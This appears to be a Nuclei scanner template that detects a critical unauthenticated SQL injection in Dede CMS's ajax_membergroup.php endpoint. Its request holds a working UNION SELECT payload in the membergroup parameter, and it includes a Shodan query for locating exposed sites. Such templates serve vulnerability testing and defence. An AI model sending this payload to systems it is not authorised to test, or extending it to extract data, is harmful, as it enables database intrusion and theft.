id: dedecms-membergroup-sqli

info:
  name: Dede CMS - SQL Injection
  author: pikpikcu
  severity: critical
  description: Dede CMS contains a SQL injection vulnerability which allows remote unauthenticated users to inject arbitrary SQL statements via the ajax_membergroup.php endpoint and the membergroup parameter.
  reference:
    - http://www.dedeyuan.com/xueyuan/wenti/1244.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
    shodan-query: http.html:"DedeCms"
  tags: sqli,dedecms
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'
        part: body

      - type: status
        status:
          - 200

# digest: 4b0a0048304602210097a5359ccf80e760f5a550c7636e5d045a9cdd76126f2670b7c54497ad16ae09022100a888d0339b9a32f31777e90b7cd073cff9b6182877a180fc77dd8b990b7b45e3:922c64590222798bb761d5b6d8e72950
